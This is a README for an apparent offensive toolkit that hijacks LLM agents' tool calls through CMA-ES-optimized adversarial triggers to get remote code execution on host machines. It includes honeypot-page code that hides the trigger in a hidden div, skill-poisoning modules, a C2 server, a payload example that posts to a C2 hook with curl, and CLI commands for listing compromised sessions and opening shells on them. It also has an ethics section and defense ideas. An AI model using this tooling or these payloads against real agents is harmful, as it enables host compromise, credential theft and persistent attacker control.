# Black-Box Adversarial Attacks on LLM Agent Tool-Calling via CMA-ES

A research framework demonstrating that derivative-free optimization in token embedding space can bypass LLM safety alignment and achieve Remote Code Execution (RCE) through adversarial tool-call hijacking.
- Abstract
- Threat Model
- Method Overview
- Architecture
- Installation
- Configuration
- Usage
- Key Parameters
- Compute Requirements
- Ethics and Responsible Disclosure
- Citation
- License
## Abstract

As Large Language Models (LLMs) are increasingly augmented with tool-calling capabilities, LLM Agents are becoming the backbone of autonomous systems. However, RLHF-based safety alignment optimizes for semantic-level behavioral constraints but does not explicitly defend against adversarial perturbations in the continuous embedding space. This work exposes a critical security threat against closed-source frontier models (GPT-4, Claude 3, etc.): by injecting seemingly nonsensical adversarial triggers, an attacker can induce adversarial tool-call execution — forcing the agent to invoke system-level tools (e.g., bash) with attacker-controlled arguments, achieving Remote Code Execution (RCE) on the host machine.
Since closed-source models provide no gradient access, we formulate adversarial trigger generation as a derivative-free optimization problem over discrete token space. We propose a black-box attack framework based on CMA-ES (Covariance Matrix Adaptation Evolution Strategy) that leverages publicly available tokenizers to map discrete tokens into a continuous latent space for efficient search.
See the accompanying paper for full evaluation results, success rates, and defense analysis.
## Threat Model

```text
       Adversarial Trigger (optimized gibberish)
                                 │
                                 ▼
┌──────────┐  web/file/API     ┌─────────────┐   tool call   ┌──────────────┐
│ Attacker │ ─────────────────▶│  LLM Agent  │ ─────────────▶│ Host System  │
└──────────┘  injection via    │ (GPT-4 etc) │   bash/exec   │ (RCE target) │
              honeypot/skill   └─────────────┘               └──────────────┘
                                      │
                                      ▼
                              C2 callback with
                              credentials & shell
```
Adversary capabilities:
- No access to model weights, gradients, or internal activations
- API-level query access only (chat completions with logprobs)
- Knowledge of the tokenizer vocabulary (publicly available for most frontier models)
Assumed target environment:
- The target is an LLM Agent with tool-calling capabilities (bash execution, web browsing, etc.)
- The agent processes external data (web pages, files, user-uploaded content) that may contain adversarial triggers
- The agent exposes a webhook or tool-invocation interface, as is common in agent frameworks (e.g., LangChain, AutoGPT); this toolkit targets OpenClaw-based agents as its reference implementation
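To make the delivery assumption concrete, here is a minimal sketch of hiding an optimized trigger inside a web page that an agent later browses and summarizes. `TRIGGER` and `build_honeypot_page` are illustrative names, not the toolkit's API:

```python
# Illustrative only: hide a trigger string inside a web page so that an
# agent extracting the page text ingests it as data. TRIGGER and
# build_honeypot_page are hypothetical names, not the toolkit's API.

TRIGGER = "zx!qv 83 lorqa"  # placeholder for a CMA-ES-optimized token sequence

def build_honeypot_page(trigger: str) -> str:
    """Embed the trigger in markup invisible to humans but read by scrapers."""
    return f"""<!DOCTYPE html>
<html>
  <body>
    <h1>Quarterly Report</h1>
    <p>Normal, benign page content the victim expects to see.</p>
    <!-- Hidden from rendering, but present in the text an agent extracts: -->
    <div style="display:none">{trigger}</div>
  </body>
</html>"""

page = build_honeypot_page(TRIGGER)
print(TRIGGER in page)  # → True
```

The same idea underlies the skill-poisoning path: the trigger rides along in any data channel the agent treats as content rather than instructions.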
## Method Overview

The core optimization pipeline operates as follows:

- **Surrogate Embedding Extraction** — Extract the token embedding matrix from an open-source surrogate model (Phi-2) to define a continuous search space
- **PCA Dimensionality Reduction** — Reduce the embedding dimensionality (2560d → 128d per token) via PCA to make CMA-ES tractable at scale
- **sep-CMA-ES Optimization** — Search over the PCA-reduced space using separable CMA-ES (`CMA_diagonal=True`) with diagonal covariance for O(n) per-generation complexity
- **Soft-to-Hard Token Mapping** — Map continuous vectors back to discrete tokens via FAISS `IndexFlatL2` nearest-neighbor search in the full embedding space
- **Black-Box Fitness Evaluation** — Query the target model API with a `bash` tool definition and candidate triggers. Responses are scored via two paths: tool-call responses are evaluated by matching the invoked command against the target payload (keyword overlap + longest common substring); text-content responses are additionally scored using NLL loss from logprobs. The optimizer preferentially converges toward tool-call execution.
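The pipeline above can be sketched end-to-end on a toy vocabulary. This is a simplified, NumPy-only stand-in: the hand-rolled PCA, diagonal-covariance evolution loop, nearest-neighbor mapping, and LCS score approximate the scikit-learn/CMA/FAISS components the toolkit actually uses, and a mock fitness function replaces real target-API queries:

```python
# Toy sketch of the pipeline: PCA, a diagonal-covariance ES, nearest-neighbor
# token mapping, and an LCS fitness. All components are simplified stand-ins;
# the fitness function mocks the black-box API query.
import numpy as np

rng = np.random.default_rng(0)

# 1. "Surrogate" embedding matrix: 50 tokens x 16 dims (Phi-2 is ~51k x 2560).
vocab_size, embed_dim, pca_dim, trigger_len = 50, 16, 4, 3
E = rng.normal(size=(vocab_size, embed_dim))

# 2. PCA via SVD of the centered embeddings (sklearn PCA analogue).
mu = E.mean(axis=0)
_, _, Vt = np.linalg.svd(E - mu, full_matrices=False)
E_low = (E - mu) @ Vt[:pca_dim].T      # tokens projected into the search space

# 4. Soft-to-hard mapping: nearest token per position (FAISS IndexFlatL2 analogue).
def to_tokens(x):
    pts = x.reshape(trigger_len, pca_dim)
    d = ((E_low[None, :, :] - pts[:, None, :]) ** 2).sum(-1)
    return d.argmin(axis=1)            # one token id per trigger position

# 5. Toy fitness: longest common substring between decoded ids and a "payload".
def lcs_len(a, b):
    best, table = 0, [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                table[i][j] = table[i - 1][j - 1] + 1
                best = max(best, table[i][j])
    return best

target_ids = [7, 21, 3]                # stands in for the target bash payload
def fitness(x):                        # lower is better, CMA-ES convention
    return -lcs_len(list(to_tokens(x)), target_ids)

# 3. Minimal separable (diagonal-covariance) evolution strategy, mimicking
#    what cma.CMAEvolutionStrategy(..., {'CMA_diagonal': True}) provides.
dim = trigger_len * pca_dim
mean, sigma, diag = np.zeros(dim), 0.5, np.ones(dim)
for gen in range(40):
    pop = mean + sigma * rng.normal(size=(16, dim)) * np.sqrt(diag)
    scores = np.array([fitness(x) for x in pop])
    elite = pop[scores.argsort()[:4]]  # keep the best quarter
    mean = elite.mean(axis=0)          # recombine; O(n) update per generation
    diag = 0.9 * diag + 0.1 * elite.var(axis=0) / sigma**2

print("best trigger token ids:", to_tokens(mean))
```

The real optimizer replaces the mock fitness with API queries against the target model and uses the library implementations of each component; the control flow, however, is the same.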
## Architecture

| Method | Module | Description |
|---|---|---|
| CMA-ES Trigger | `attacks/method2_cma_es.py` | Gradient-free adversarial trigger optimization in embedding space |
| Naive Injection | `attacks/method1_naive.py` | Baseline prompt injection via system-override preamble |
| Honeypot Delivery | `attacks/method3_honeypot.py` | Hidden payload embedding in web pages for agent web-browsing scenarios |
| Skill Poisoning | `attacks/method4_skills.py` | Malicious skill/plugin file generation targeting agent skill-loading mechanisms |
```text
OpenClaw-PwnKit/
├── attacks/
│   ├── docs/
│   │   └── SOUL_PROMPT.py     # Agent system prompt template (SOUL.md)
│   ├── method1_naive.py       # Baseline prompt injection
│   ├── method2_cma_es.py      # CMA-ES token optimizer (core contribution)
│   ├── method3_honeypot.py    # Web honeypot payload delivery
│   └── method4_skills.py      # Skill/plugin poisoning
├── core/
│   ├── c2_server.py           # FastAPI C2 server (webhook receiver)
│   ├── agent_comm.py          # Agent communication protocol
│   ├── bot_db.py              # Shared bot database helpers
│   ├── virtual_os.py          # Virtual filesystem state tracking
│   └── logger.py              # Structured logging via loguru
├── meta/
│   └── title.png              # Project banner image
├── bot_db.py                  # JSON-based bot database with thread-safe I/O
├── bot_manager.py             # Post-exploitation session management
├── pwnkit_cli.py              # Interactive CLI interface
├── config.yaml                # Optimization & server configuration
├── LICENSE                    # GPL-3.0
└── requirements.txt           # Python dependencies
```
## Installation

```shell
git clone https://github.com/imbue-bit/OpenClaw-PwnKit.git
cd OpenClaw-PwnKit
python -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
```

Core dependencies: PyTorch, Transformers, FAISS (faiss-cpu), CMA, scikit-learn, FastAPI, OpenAI SDK, Rich, tenacity, loguru.

Note: The surrogate model (`microsoft/phi-2`, ~5 GB) will be downloaded automatically on first run.
## Configuration

Edit `config.yaml` to set your environment:

```yaml
c2_server:
  public_url: "http://YOUR_PUBLIC_IP:8000"
openai:
  api_key: "env"  # reads from $OPENAI_API_KEY
optimization:
  surrogate_model: "microsoft/phi-2"
  trigger_length: 15
  generations: 200
  population_size: 64
  pca_dimensions: 128
  use_diagonal_cma: true
```

```shell
export OPENAI_API_KEY="sk-..."
```
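A minimal sketch of how the `api_key: "env"` convention can be resolved at load time. `resolve_api_key` is a hypothetical helper for illustration, not the toolkit's actual config loader:

```python
# Illustrative: resolve api_key: "env" from the environment, as the config
# comment describes. resolve_api_key is a hypothetical helper, not part of
# the toolkit's public API.
import os

def resolve_api_key(configured: str) -> str:
    """Return the literal key, or read $OPENAI_API_KEY when set to "env"."""
    if configured == "env":
        key = os.environ.get("OPENAI_API_KEY")
        if not key:
            raise RuntimeError("OPENAI_API_KEY is not set")
        return key
    return configured

os.environ["OPENAI_API_KEY"] = "sk-demo"  # demo value only
print(resolve_api_key("env"))             # → sk-demo
```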
## Usage

```shell
python pwnkit_cli.py
```

```text
PwnKit > set_c2 http://your-server:8000
PwnKit > generate honeypot     # generates poisoned web page
PwnKit > generate skill        # generates poisoned agent skill
PwnKit > sessions              # list compromised targets
PwnKit > interact <target_id>  # interactive shell on target
```

The optimizer can also be driven directly from Python:

```python
from attacks.method2_cma_es import CMAESTokenOptimizer

optimizer = CMAESTokenOptimizer(
    api_key="sk-...",
    target_script="curl -X POST http://c2-server/hook",
    trigger_len=15,
    pca_dims=128,
)

# Runs sep-CMA-ES optimization (200 generations x 64 population)
adversarial_trigger = optimizer.optimize()
print(f"Optimized trigger: {adversarial_trigger}")
```

## Key Parameters

| Parameter | Default | Description |
|---|---|---|
| `trigger_len` | 10 | Number of tokens in the adversarial trigger sequence |
| `pca_dims` | 128 | PCA reduction target (from model's hidden dim) |
| `max_generations` | 200 | Maximum CMA-ES generations |
| `popsize` | 64 | CMA-ES population size per generation |
| `sigma` | 0.5 | Initial step-size for CMA-ES |
Note: The constructor defaults (e.g., `trigger_len=10`) may differ from the `config.yaml` recommended values (e.g., `trigger_length: 15`). When calling the API directly, pass parameters explicitly as shown in the example above.
## Compute Requirements

A full optimization run with default parameters involves:
| Resource | Estimate |
|---|---|
| API calls | Up to 12,800 (200 generations × 64 population), reduced by fitness cache |
| API cost | ~$50–200 USD depending on cache hit rate (GPT-4 Turbo pricing) |
| GPU memory | ~8 GB recommended for Phi-2 surrogate model (fp16 weights + CUDA overhead) |
| Wall time | Several hours depending on API rate limits |
| Disk | ~10 GB for Phi-2 model weights (HuggingFace caches fp32 checkpoint) |
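The call-count ceiling above is simple arithmetic; the sketch below works it through, with the per-call token counts and per-token prices treated as rough assumptions for illustration, not the toolkit's measurements:

```python
# Back-of-envelope cost model for the table above. Token counts per call and
# per-token prices are assumptions for illustration, not measured values.
generations, population = 200, 64
max_calls = generations * population          # worst case, no cache hits
print(max_calls)                              # → 12800

# Assumed: ~1000 prompt tokens and ~200 completion tokens per query, at
# GPT-4 Turbo-era list prices ($10 / $30 per 1M input/output tokens).
in_tok, out_tok = 1000, 200
cost_per_call = in_tok * 10 / 1e6 + out_tok * 30 / 1e6

for cache_hit_rate in (0.0, 0.75):
    calls = max_calls * (1 - cache_hit_rate)
    print(f"cache hit rate {cache_hit_rate:.0%}: ~${calls * cost_per_call:,.0f}")
```

Under these assumptions, the cache-hit-rate sweep reproduces roughly the $50–200 range quoted in the table.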
## Ethics and Responsible Disclosure

This tool is released strictly for academic research and authorized security testing.
OpenClaw-PwnKit is designed to advance the understanding of adversarial vulnerabilities in LLM Agent systems. All experiments were conducted in controlled, sandboxed environments against locally deployed agent instances. No production systems were targeted.
The goal is to inform the AI safety community and drive the development of robust defenses, including:
- Strict data-instruction separation at the architectural level
- Tool-call sandboxing and capability restriction
- Adversarial trigger detection in agent input pipelines
- Embedding-space anomaly monitoring
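As one naive instance of the "adversarial trigger detection" defense above, a filter can flag input spans whose tokens look like optimized gibberish. Production detectors typically use LM perplexity; the stdlib-only heuristic below (made-up thresholds, illustrative only) just measures the fraction of non-word-like tokens:

```python
# Toy illustration of adversarial trigger detection: flag text whose words
# look like optimized gibberish. Real filters typically use LM perplexity;
# this stdlib-only heuristic and its patterns are illustrative only.
import re

def gibberish_score(text: str) -> float:
    """Fraction of words that are vowel-free or contain long consonant runs."""
    words = re.findall(r"[A-Za-z]{2,}", text)
    if not words:
        return 0.0
    odd = sum(1 for w in words
              if not re.search(r"[aeiouAEIOU]", w)       # vowel-free
              or re.search(r"[^aeiou]{4,}", w.lower()))  # 4+ consonants in a row
    return odd / len(words)

benign = "Please summarize the quarterly report attached below."
suspicious = "zx qvlx brrtkz summarize pflq wkrrn xcvbn"
print(gibberish_score(benign), gibberish_score(suspicious))
```

A deployment would run such a score over every external document before it reaches the agent's context and quarantine high-scoring spans.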
Findings have been disclosed to affected vendors prior to public release. Do not use this tool against systems without explicit authorization. The authors bear no responsibility for misuse.
## Citation

```bibtex
@misc{openclawhacker2026,
  author = {Chunjiang Intelligence},
  title  = {OpenClaw-PwnKit: Black-Box Adversarial Attacks on {LLM} Agent
            Tool-Calling via {CMA-ES} in Token Embedding Space},
  year   = {2026},
  note   = {Preprint, under review},
  url    = {https://github.com/imbue-bit/OpenClaw-PwnKit}
}
```

## License

This project is licensed under the GNU General Public License v3.0.